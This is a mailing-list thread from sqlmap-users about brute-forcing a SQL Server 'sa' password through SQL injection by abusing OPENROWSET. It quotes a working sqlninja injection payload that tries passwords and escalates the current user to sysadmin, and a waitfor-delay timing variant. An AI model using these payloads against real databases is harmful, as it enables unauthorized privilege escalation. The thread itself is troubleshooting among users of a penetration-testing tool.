Hi Juan
I'm not convinced it's due to either of your suggestions.
If openrowset is disabled, you'll get an error message that begins
something like:
SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of
component 'Ad Hoc Distributed Queries' because this component is turned off
as part of the security configuration for this server.
The statement that your instance of SQLNinja is sending out differs from
mine (are you using -m b -w /path/to/wordlist.txt)? My queries looks
similar to this:
select * from
OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=sa;pwd=passwordguess','waitfor
delay ''0:0:59'';select 1;');--
If the sa password is incorrect, the error message should be along the
lines of:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'sa'.
If the sa password is correct, then you'll get the appropriate delay and
probably a 200 response (though not necessarily, but you'll definitely get
the delay).
I'm guessing that your error message is something to do with user
permissions for the DBMS, a quick Google seemed to suggest that, but I'm
confident it has little to do with openrowset being disabled or an
incorrect sa password. I assume you have mixed mode authentication in
place on SQL Server?
You can check if openrowset is enabled using sp_configure, see the
following link for more information:
http://social.msdn.microsoft.com/Forums/en/transactsql/thread/c3d3295b-933b-4ee8-934c-87c8d6a47260
Sorry to talk about a different SQL injection tool on this list. I would
add that it'd be good to see some of the bits of SQLNinja functionality
that are missing from SQLMap implemented in the future if it's not already
planned (not that there's a lot of missing functionality).
Cheers
Chris
On 24 July 2012 14:26, juan molina <j.molina04...@gmail.com> wrote:
> I was trying sqlninja.
>
> this is the query it use for bruteforce SA password with 1 character
> (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q
> nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789'
> while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set
> @z='''''' set @p=@p+@z set @q=N'select 1 from
> OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
> 1;exec master.dbo.sp_addsrvrolemember
> '''''+system_user+N''''',''''sysadmin'''' '')' exec
> master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
>
> but I am receiving this error:
>
>
> *Could not find stored procedure 'master.dbo.xp_execresultset'.*
>
> it was in the HTTP response. this error is because the "openrowset" is
> disable? or is just that the "SA" password is not the correct. (like
> "password wrong" error).
>
> there is any way to check if "openrowset" is enable?
>
>
> thanks.
>
>
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. <
> bernardo.dam...@gmail.com> wrote:
>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to
>> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
>> released a paper demonstrating how to abuse this function to perform a
>> DBMS user's password brute-force attack within the MSSQL instance. A
>> few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password
>> brute-force attack. We have the required code in place, see issue
>> #34[3] and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
>> 2005 RTM it is disabled by thereforce, hence either the database
>> administrator has manually enabled it, or you won't be able to abuse
>> this function to brute-force the 'sa' (DBA) password hash or run
>> statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>>
>> On 20 July 2012 12:14, juan molina <j.molina04...@gmail.com> wrote:
>> > there is a way for bruteforce the SA password using SQL INJECTION?
>> >
>> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
>> > access to the internet (it has the 1433 port blocked),
>> > the current user is a normal user (low privileges User). cannot get SA
>> hash
>> > password.
>> >
>> > the question is, is there any tool or code or way to bruteforce the SA
>> > password? without direct access to the Sql Server?
>> >
>> > It is a request for add this functionality to SQLMAP, I don't know if is
>> > possible.
>> >
>> > Thanks.
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Live Security Virtual Conference
>> > Exclusive live event will cover all the ways today's security and
>> > threat landscape has changed and how IT managers can respond.
>> Discussions
>> > will include endpoint security, mobile security and the latest in
>> malware
>> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sqlmap-users@lists.sourceforge.net
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
